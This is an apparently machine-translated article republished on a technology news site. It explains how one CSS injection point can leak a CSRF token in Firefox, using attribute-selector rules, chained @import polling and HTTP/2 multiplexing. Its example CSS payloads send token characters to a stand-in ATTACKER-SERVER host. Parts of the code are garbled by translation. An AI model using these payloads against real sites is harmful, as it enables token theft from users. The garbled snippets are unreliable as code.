Shulou(Shulou.com)05/31 Report--

This article mainly introduces how to use a single injection point to extract CSS data from the Firefox browser, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let Xiaobian take you to understand.

Basic technology and existing technology

In our demo example, suppose we want to get the CSRF token in the element:

Perhaps because of the content security policy, we cannot use scripts to do this here, so we try to find style-based injection points. In general, we choose to use the property selector:

Input [name = 'csrftoken'] [value ^ =' a'] {background: url (/ / ATTACKER-SERVER/leak/a);} input [name = 'csrftoken'] [value ^ =' b'] {background: url (/ / ATTACKER-SERVER/leak/b);}. Input [name = 'csrftoken'] [value ^ =' z'] {background: url (/ / ATTACKER-SERVER/leak/z);}

If CSS rules are deployed here, an attacker can obtain an HTTP request and then extract the first character of the token. Next, the attacker needs to prepare another stylesheet that contains the first character that has been stolen:

Input [name = 'csrftoken'] [value ^ =' aa'] {background: url (/ / ATTACKER-SERVER/leak/aa);} input [name = 'csrftoken'] [value ^ =' ab'] {background: url (/ / ATTACKER-SERVER/leak/ab);}. Input [name = 'csrftoken'] [value ^ =' az'] {background: url (/ / ATTACKER-SERVER/leak/az);}

At this point, the attacker needs to reload the in the target page to provide subsequent stylesheets.

In 2018, Pepe Vila provided a way to leverage a single injection point in Chrome browsers using CSS recursive imports. In 2019, Nathanial Lattimer (@ d0nutptr) proposed a new improvement based on this technology, which is more suitable for the scenario of this article for Firefox browsers.

During the first injection, we need to use a lot of import:

@ import url (/ / ATTACKER-SERVER/polling?len=0); @ import url (/ / ATTACKER-SERVER/polling?len=1); @ import url (/ / ATTACKER-SERVER/polling?len=2); The operation mechanism of this technology is as follows:

First, at the beginning, only the first @ import returns a stylesheet, and the other statements are in a connection blocking state. At this point, the first @ import returns the target style sheet, which contains the first character of the token. Next, when the leaked first token reaches the attacker's server-side ATTACKER-SERVER, the second @ import stops blocking and returns the stylesheet containing the first character of the token, and then attempts to get the second character in the token. Finally, when the second leaked character reaches the attacker's server-side ATTACKER-SERVER, the third @ import stops blocking. and so on.

This technique works because Chrome handles @ import asynchronously, so when any @ import stops blocking, Chrome parses the statement and applies execution.

Firefox and style sheet processing

Firefox handles stylesheets in a completely different way than Chrome. First, Firefox processes the stylesheet synchronously. Therefore, when there is more than one @ import in the stylesheet, the CSS rule is applied only when all @ import has been processed. For example:

@ import'/ polling/0';@import'/ polling/1';@import'/ polling/2'

Suppose that when the first @ import returns the CSS rule, the background of the page will be set to blue and the subsequent @ import will be blocked. In Chrome, the page immediately turns blue, but there is no reaction in Firefox.

At this point, we can put all @ import separately in the element:

@ import'/ polling/0';@import'/ polling/1';@import'/ polling/2'

In the above code, Firefox will process all the stylesheets separately, and the pages in Firefox will immediately turn blue, while the other @ import will be processed in the background.

However, there is another problem, for example, we want to steal a 10-character token:

@ import'/ polling/0';@import'/ polling/1';@import'/ polling/2';...@import'/ polling/10'

Firefox immediately queues 10 @ import. After processing the first @ import, Firefox queues another request with a known character. The problem is that the request is appended to the end of the line. By default, the browser can only establish six concurrent links with the same server. As a result, requests with known characters never reach the target server because the server already has six blocked links, and a deadlock occurs.

Solution: HTTP/2

The limit of six concurrent links is determined by the TCP layer, so only six TCP links can exist on a single server at a time. One of the advantages of HTTP/2 is that it supports sending multiple HTTP requests (that is, multiplexing) over a single link, thus greatly improving network performance.

However, Firefox also has a limit on the number of concurrent requests for a single HTTP/2 connection, which is limited to 100 by default. If you need to use more concurrent links, you need to set it up with a different hostname and force Firefox to create multiple TCP links.

For example, if we create 100 requests to https://localhost:3000 and then 50 requests to https://127.0.0.1:3000, then Firefox will create two TCP links.

Utilization of technology

The technology utilization scenarios are as follows:

1. The code is implemented based on HTTP/2

2. The "/ polling/:session/:index" node returns a CSS and exposes the ": index" character. The request is blocked until the previous request successfully reveals the ": index-1" character. Among them, the ": session" path parameter is used to distinguish multiple attacks.

3. Obtain the complete token through the "/ leak/:session/:value" node, where ": value" is the obtained complete token value.

4. In order to force Firefox to initiate two TCP links to the same server, two nodes are used here, namely https://localhost:3000 and https://127.0.0.1:3000.

Use the "/ generate" node to generate the sample code.

Test demonstration

Thank you for reading this article carefully. I hope the article "how to use a single injection point to extract CSS data from Firefox browsers" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.